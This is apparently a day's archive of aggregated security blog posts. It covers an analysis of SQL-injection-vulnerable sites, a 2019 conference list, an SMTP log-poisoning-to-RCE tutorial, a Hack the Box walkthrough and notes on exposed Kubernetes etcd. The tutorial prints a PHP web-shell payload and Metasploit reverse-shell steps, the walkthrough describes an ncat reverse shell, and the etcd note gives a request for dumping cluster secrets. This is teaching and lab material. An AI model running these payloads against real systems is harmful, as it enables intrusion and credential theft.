Daily Archives: January 6, 2019

How to data breaches happen

Data breaches happen.

Today, as never before, data plays a fundamental role in our real life. Everybody is both:  data producer and data consumer. We are data producer by simply moving from one building to another one, having a smartphone in our pocket or surfing the web or just by tapping on smartphone applications. We are data consumer when we buy things on Amazon or when we read information on social networks or again when we consume raw data through API. Somebody refers to data as the "new Oil"  (concept usually accredited to Clive Humby)  and data is what we let on the digital world and it's what we have very close to our physical life. Data is what we are on the cyber space. Data is what we need to protect. 

Protecting our private data is like protecting ourselves in the cyber world and for such a reason the protection needs to be regulated (GDPR teaches us).  So it might be very interesting to understand how data breaches might happen.

Unfortunately there is not a standard path to protect, for example a data breach might come through an insider attack, or by clicking on a malspam champaign or hitting eMail phishing or again through common vulnerabilities.  But one of the main path, so far, is driven by vulnerability. One of the most exploited vulnerability from attackers to illegally collect data is SQL-Injection. It is pretty easy to detect and to exploit even for not sophisticated attackers. But on the other side of the coin there are a lot of frameworks, designed patterns and methodologies to prevent and to block such a vulnerability. From here, I've started my research. I wanted to prove that SQLi vulnerabilities are quite "rare" (or difficult to find) in 2019, but -- unfortunately -- I acknowledged that I was wrong when I found these fresh pastes (here, here and here). The "possible attacker" exposed a set of "presumed" SQLi vulnerable websites harvested in a metter of 24h internet scanning. 

principal domain names with SLQi
According to the "pastes" the attacker harvest 327 circa vulnerable websites in less then a day ! So let's dig a little bit on them to see if we might find some interesting correlations.

A first interesting result comes from the first level domain names. Leaving out ".com" (which actually is the most common used domain name) it is possible to see additional interesting domain names such as ".ca", ".it", ".ir", ".ch", ".il" and so on, which are mostly "country" based domain names. I agree with those who might think that the used dataset could not be considered as a "significative dataset", since 24h of internet scraping is far-far-far away from having an internet significative view, but we might agree that it could be considered as an "indicative dataset". In other words if in only 24h of internet scraping he/she found 327 circa vulnerable websites, let's immagine what an attacker could do with weeks or months of scraping power. Still interesting to see that no specific geographic targets and/or country patterns emerged (for example: only richest/poorest countries or European countries,  or countries with cyber activists, or countries in a war conflict, etc..) suggesting that the issue (having vulnerable SQLi WebSite) is still quite spread all over the world.  The following map shows the geo-distribution domain names where domains such as: ".ld",".dk",".nz",".ug", "gk", ... , took a single hit, so are not visualised.

Domain Names Geographically Distributed

The following histogram shows the percentage of web server technology found in "presumed" vulnerable websites. Apache and Nginx are the most common used technology. I am not saying that Apache and Nginx are vulnerable to SQLi or that they might infer or enable  in somehow vulnerable webpages. Yet I am not saying that they are responsible in anyway of serving vulnerable applications. Indeed vulnerable applications does not have a direct link to the used web server, I am just observing the analysed data. It could be an "obvious consequence", since Apache and Nginx technologies are the most used over the web, or maybe not. 

Percentage of WebServer Technology in front of vulnerable websites
A little bit more interesting is the DB Technology distribution used in presumed SQLi vulnerable websites. It might highlight the application "type". For example we might believe that applications built on top of Microsoft Access are quite "old applications" (this is not always true, I'm aware of it, but it might be an indicative parameter to be considered on SQLi researches) or applications built on top of Oracle databases might be corporate applications and not opensource and/or "mockup" applications. Or we might stretch a little bit this concept by assuming that applications built on top of Microsoft SQL servers might be professional/company applications and so on and so forth. Of course we cannot walk the same way starting from MySql or PostreSQL since both of them are used into opensource/free applications as well as corporate and professional ones.

Percentage of DataBase Technology in of vulnerable websites backend
Everyday we read about personal data breaches. One of the least ones happened on German Politics (more info here, here and here). (P) Data breaches might sap our companies and our digital identities, regulations have been made trying to normalise and to block breaches, but unfortunately in 2019 is still easy to get random personal data out of internet. In this personal research started on the darkweb and finally ended up on "paste" website,  I've found out that a common and quite easy way to mine personal data, even in 2019, is through SQLinjection which is surprisedly still effective although hundreds of countermeasures (such as: frameworks, design patters, native parametrised queries, etc..). The main reason of the 327 circa vulnerable websites found in less then a day (according to the found pasties) are the un-patched software version. In fact it could be easy to find common google dorks on the attacker patterns. To block well-known SQLi vulnerabilities is pretty simple as patching your website. Please do it for the safety of your users.

Cyber Security Conferences to Attend in 2019

A list of Cyber and Information Security conferences to consider attending in 2019. Conference are not only great places to learn about the evolving cyber threat landscape and proven security good practices, but to network with industry leading security professionals and likeminded enthusiasts, to share ideas, expand your own knowledge, and even to make good friends.


SANS Cyber Threat Intelligence Summit
Monday 21st & Tuesday 22nd January 2019
Renaissance Arlington Capital View Hotel, VA, USA

AppSec California 2019 (OWASP)
Tuesday 22nd & Wednesday 23rd January 2019
Annenberg Community Beach House, Santa Monica, USA

PCI London
Thursday 24th January 2019
Park Plaza Victoria Hotel, London, UK

The Future of Cyber Security Manchester
Thursday 24th January 2019
Bridgewater Hall, Manchester, UK

BSides Leeds
Friday 25th January 2019
Cloth Hall Court, Leeds, UK
Cyber Security for Industrial Control Systems

Thursday 7th & Friday 8th February 2019
Savoy Place, London, UK

NOORD InfoSec Dialogue UK
Tuesday 26th & Wednesday 27th February 2019
The Bull-Gerrards Cross, Buckinghamshire, UK

MARCH 2019
RSA Conference
Monday 4th to Friday 8th March 2019
At Moscone Center, San Francisco, USA

17th Annual e-Crime & Cybersecurity Congress
Tuesday 5th & Wednesday 6th March 2019
Park Plaza Victoria

Security & Counter Terror Expo
Tuesday 5th & Wednesday 6th March 2019
Olympia, London, UK

ISF UK Spring Conference
Wednesday 6th & Thursday 7th March 2019
Regent Park, London, UK

Sunday 3rd and Monday 4th March 2019
City View at Metreon, San Francisco, USA

Cloud and Cyber Security Expo
Tuesday 12th to Wednesday 13 March 2019
At ExCel, London, UK

APRIL 2019

(ISC)2 Secure Summit EMEA
Monday 15th & Tuesday 16th April 2019
World Forum, The Hague, Netherlands

Cyber Security Manchester
Wednesday 3rd & Thursday 4th April 2019
Manchester Central, Manchester, UK

BSides Scotland 2019
Tuesday 23rd April 2019
Royal College of Physicians, Edinburgh, UK

CyberUK 2019
Wednesday 24th & Thursday 25th April 2019
Scottish Event Campus, Glasgow, UK

Cyber Security & Cloud Expo Global 2019
Thursday 25th and Friday 29th April 2019
Olympia, London, UK

JUNE 2019
Infosecurity Europe 2019
Tuesday 4th to Thursday 6th June 2019
Where Olympia, London, UK

BSides London

Thursday 6th June 2019
ILEC Conference Centre, London, UK

Blockchain International Show
Thursday 6th and Friday 7th June 2019
ExCel Exhibition & Conference Centre, London, UK

Hack in Paris 2019
Sunday 16th to Friday 20th June 2019
Maison de la Chimie, Paris, France

UK CISO Executive Summit
Wednesday 19th June 2019
Hilton Park Lane, London, UK

Cyber Security & Cloud Expo Europe 2019
Thursday 19th and Friday 20th June 2019
RIA, Amsterdam, Netherlands

Gartner Security and Risk Management Summit
Monday 17th to Thursday 20th June 2019
National Harbor, MD, USA

European Maritime Cyber Risk Management Summit
Tuesday 25th June 2019
Norton Rose Fulbright, London, UK

Black Hat USA
Saturday 3rd to Thursday 8th August 2019
Mandalay Bay, Las Vegas, NV, USA


Thursday 8th to Sunday 11th August 2019
Paris, Ballys & Planet Hollywood, Las Vegas, NV, USA

Wednesday 11th to Friday 13th September 2019
ILEC Conference Centre, London, UK

2019 PCI SSC North America Community Meeting
Tuesday 17th to Thursday 19th September 2019
Vancouver, BC, Canada


Hacker Halted
Thursday 10th & Friday 11th October 2019
Atlanta, Georgia, USA

Thursday 10th & Friday 11th October 2019
Aula, Gent, Belgium


Wednesday 16th to Friday 19th October 2019
Palexpo Convention Centre, Geneva, Switzerland

6th Annual Industrial Control Cyber Security Europe Conference
Tuesday 29th and Wednesday 30th October 2019
Copthorne Tara, Kensington, London, UK

2019 PCI SSC Europe Community Meeting

Tuesday 22nd to Thursday 24th October 2019
Dublin, Ireland

ISF 30th Annual World Congress
Saturday 26th to Tuesday 29th October 2019
Convention Centre Dublin, Dublin, Ireland

Cyber Security & Could Expo North America 2019
Wednesday 13th and Thursday 14th November 2019
Santa Clara Convention Centre, Silicon Valley, USA

DevSecCon London 
Thursday 14th & Friday 15th November 2019
CodeNode, London, UK

Cyber Security Summit 2019
Wednesday 20th November 2019
QEII Centre, London, UK

2019 PCI SSC Asia-Pacific Community Meeting 

Wednesday 20th and Thursday 21st November 2019
Melbourne, Australia

Thursday 20th to Saturday 30th November 2019
The Imperial Riding School Vienna, Austria

Post in the comments about any cyber & information security themed conferences or events you recommend.

SMTP Log Poisioning through LFI to Remote Code Excecution

Hello friends!! Today we will be discussing on SMTP log poisoning. But before getting in details, kindly read our previous articles for “SMTP Lab Set-Up” and “Beginner Guide to File Inclusion Attack (LFI/RFI)” . Today you will see how we can exploit a web server by abusing SMTP services if the web server is vulnerable to local file Inclusion.

Let’s Start!!

With the help of Nmap, we scan for port 25 and as result it shows port 25 is open for SMTP service.

nmap -p25

This attack is truly based on Local file Inclusion attack; therefore I took help of our previous article where I Created a PHP file which will allow the user to include a file through file parameter.

As a result, you can observe that we are able to access /etc/passwd file of victim machine.

Now if you are able to access the mail.log file due to LFI, it means the mail.log has read and write permission and hence we can infect the log file by injecting malicious code.

Now let’s try to enumerate further and connect to the SMTP (25) port

telnet 25

As we can see, we got connected to the victim machine successfully. Now let’s try to send a mail via command line (CLI) of this machine and send the OS commands via “RCPT TO” option. Since the mail.log file generates log for every mail when we try to connect with web server. Taking advantage of this feature now I will send malicious PHP code as fake user and it will get added automatically in mail.log file as new log.

MAIL FROM:<rrajchandel@gmail.com>
RCPT TO:<?php system($_GET['c']); ?>

Note : We can ignore the 501 5.1.3 Bad recipient address syntax server response as seen in the above screenshot because ideally the internal email program of the server (victim machine), is expecting us to input an email ID and not the OS commands.

As our goal is to inject php into the logs and this stage it is called log file poisoning and we can clearly see that details of mail.log as well as execute comment given through cmd; now execute ifconfig as cmd comment to verify network interface and confirm its result from inside the given screenshot. &c=ifconfig

But you can observe its output in its source code as shown in the below image:

This is called SMTP log poisoning and through such type of vulnerability we can easily take reverse shell of victim’s machine.

use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost
msf exploit (web_delivery)>set srvport  8888
msf exploit (web_delivery)>exploit

Copy the highlighted text shown in below window

Paste the above copied malicious code inside URL as shown in given image and execute it as command.

When above code gets execute you will get meterpreter session 1 of targeted web server.


msf exploit (web_delivery)>sessions 1
meterpreter> sysinfo

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post SMTP Log Poisioning through LFI to Remote Code Excecution appeared first on Hacking Articles.

Hack the Box: Mischief Walkthrough

Today we are going to solve another CTF challenge “Mischief”. Mischief is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to their experience; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Easy

Task: To find user.txt and root.txt file

Penetration Methodologies

Scanning Network

  • TCP and UDP ports scanning (Nmap)


  • SNMP Service Enumeration (Nmap Script)
  • Obtain credential for port 3366 login
  • Identify IPv6 address (ENYX)
  • Scanning Ipv6 (Nmap)

Access Victim’s Shell

  • Abusing web server through Command Execution Panel
  • Obtain reverse Shell via ncat
  • Get user.txt flag

Privilege Escalation

  • Obtain root password from bash_history
  • Find root.txt flag

Scanning Network

Note: Since these labs are online available therefore they have a static IP. The IP of this lab is

Let’s start off with our nmap Aggressive scan to find out the open ports and services.

nmap -A

But as you can observe that here we didn’t obtain much information, therefore further I scan for UDP port and from its result we got port 161 is open for SNMP.

nmap -sU


Because we was knowing SNMP service is enable in the network, therefore I run nmap script command for snmp enumeration.

nmap -p 161 –sC –sV –sU

Hmmm!! So here I found something very interesting and it looks like the login credential to be use as authentication for port 3366.

Let’s navigate to port 3366 in the web browser and enter the following credential.

Username: loki 
Password: godofmischiefisloki

Here, we were welcomed by following web page where it was holding another credential. Let’s dig out another way to utilize this credential for login.

We use a python script called Enyx to find the ipv6 address of the target machine. You can get the script from this link.

git clone https://github.com/trickster0/Enyx
python enyx.py 2c public

So as you can observe that we have enumerated IPv6 address of victim’s machine and further scan it using nmap command given below:

nmap -6 <target IPV6>

Hmmm!! So along with Port 22, this time it has also shown port 80 for HTTP services.

So we navigate to web browser and explore Target IPv6 address in the URL, it put a login page for command execution panel. So we try to login this page with the credential we found earlier but that wasn’t the valid credential.

Access Victim’s Shell


Further I try brute force for username and successfully get login with following combination:

Username: administrator
Password: trickeryanddeceit

Since it was Command Execution Panel where we can run arbitrary system commands, hence this was RCE which could be easily exploit and we can owned reverse shell of the target machine.

But before that, you must know Ipv6 address of your local machine for addressing your IP as listening IP.

For reverse shell, I use python reverse shell code from pentestmonkey, and modify lhost IP from our IPv6 address. Since it was both nodes belong to IPv6, therefore we need a listener which can establish reverse connection such as ncat, hence we start ncat listener on port 1234.

As soon we will execute the malicious python code, we will get reverse connection via ncat.

Great!! You can observe that, we have access of remote terminal and let’s try to find out user.txt file to complete our first task. We found the user.txt file in the /home/loki but unable to read it. Although, there was another interesting file “credentials” and here we found another credential.

As port 22 was running, therefore we connect to remote machine through ssh using following credential.

Username: loki 
Password: lokiisthebestnorsegod
ssh loki@

And successfully found user.txt file this time as shown below.

Privilege Escalation

While exploring more, I found .bash_history file where I found one more credential for root user but loki doesn’t have permission to execute switch user command.

Therefore, we move back to www-data user shell to run switch user command and enter above password for root login, then try to find out root.txt file inside the root directory but there wasn’t any flag. Therefore with the help of find command we try to enumerate the path of root.txt.

find / -name root.txt

Booom!! We got the path of the root.txt file and as you can observe that we have successfully captured the last flag and finished this challenge.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Hack the Box: Mischief Walkthrough appeared first on Hacking Articles.

Kubernetes: open etcd

Quick post on Kubernetes and open etcd (port 2379)

"etcd is a distributed key-value store. In fact, etcd is the primary datastore of Kubernetes; storing and replicating all Kubernetes cluster state. As a critical component of a Kubernetes cluster having a reliable automated approach to its configuration and management is imperative."

-from: https://coreos.com/blog/introducing-the-etcd-operator.html 

What this means in english is that etcd stores the current state of the Kubernetes cluster usually including the kubernetes tokens and passwords.  If you check out the following references you can get a sense for the pain level that could potentially be involved. At minimum you can get network info or running pods and at best credentials.


the second link talks extensively around types of info the found when they hit all the shodan endpoints for 2379 and did some analysis on the results.

If you manage to find open etcd the easiest way to check for creds is to just do a curl request for:

GET http://ip_address:2379/v2/keys/?recursive=true

Example Loot - 

Usually it's boring stuff like this:

But occasionally you'll get more interesting things like:

or more fun things like kublet tokens:

Kubernetes: cAdvisor

"cAdvisor (Container Advisor) provides container users an understanding of the resource usage and performance characteristics of their running containers. It is a running daemon that collects, aggregates, processes, and exports information about running containers."

runs on port 4194


What do you get?

information disclosure about metrics of the containers.

Example request to hit the API and dump data:


Kubernetes: kube-hunter.py etcd

I mentioned in the master post one a few auditing tools that exist. Kube-Hunter is one that is pretty ok.  You can use this to quickly scan for multiple kubernetes issues.

Example run:
$ ./kube-hunter.py
Choose one of the options below:
1. Remote scanning      (scans one or more specific IPs or DNS names)
2. Subnet scanning      (scans subnets on all local network interfaces)
3. IP range scanning    (scans a given IP range)
Your choice: 1
Remotes (separated by a ','):
~ Started
~ Discovering Open Kubernetes Services...
| Etcd:
|   type: open service
|   service: Etcd
|_  host:
| Etcd Remote version disclosure:
|   type: vulnerability
|   host:
|   description:
|     Remote version disclosure might give an
|_    attacker a valuable data to attack a cluster
| Etcd is accessible using insecure connection (HTTP):
|   type: vulnerability
|   host:
|   description:
|     Etcd is accessible using HTTP (without
|     authorization and authentication), it would allow a
|     potential attacker to
|     gain access to
|_    the etcd
| Etcd Remote Read Access Event:
|   type: vulnerability
|   host:
|   description:
|     Remote read access might expose to an
|_    attacker cluster's possible exploits, secrets and more.


| TYPE        | LOCATION       |
| Node/Master |        |

Detected Services
| SERVICE | LOCATION            | DESCRIPTION          |
| Etcd    |        | Etcd is a DB that    |
|         |                     | stores cluster's     |
|         |                     | data, it contains    |
|         |                     | configuration and    |
|         |                     | current state        |
|         |                     | information, and     |
|         |                     | might contain        |
|         |                     | secrets              |

| LOCATION     | CATEGORY         | VULNERABILITY        | DESCRIPTION         | EVIDENCE                 |
| | Unauthenticated  | Etcd is accessible   | Etcd is accessible  | {"etcdserver":"3.3.9     |
|              | Access           | using insecure       | using HTTP (without | ","etcdcluster":"3.3     |
|              |                  | connection (HTTP)    | authorization and   | ...                      |
|              |                  |                      | authentication), it |                          |
|              |                  |                      | would allow a       |                          |
|              |                  |                      | potential attacker  |                          |
|              |                  |                      | to                  |                          |
|              |                  |                      |     gain access to  |                          |
|              |                  |                      | the etcd            |                          |
| | Information      | Etcd Remote version  | Remote version      | {"etcdserver":"3.3.9     |
|              | Disclosure       | disclosure           | disclosure might    | ","etcdcluster":"3.3     |
|              |                  |                      | give an attacker a  | ...                      |
|              |                  |                      | valuable data to    |                          |
|              |                  |                      | attack a cluster    |                          |
| | Access Risk      | Etcd Remote Read     | Remote read access  | {"action":"get","nod     |
|              |                  | Access Event         | might expose to an  | e":{"dir":true,"node     |
|              |                  |                      | attacker cluster's  | ...                      |
|              |                  |                      | possible exploits,  |                          |
|              |                  |                      | secrets and more.   |                          |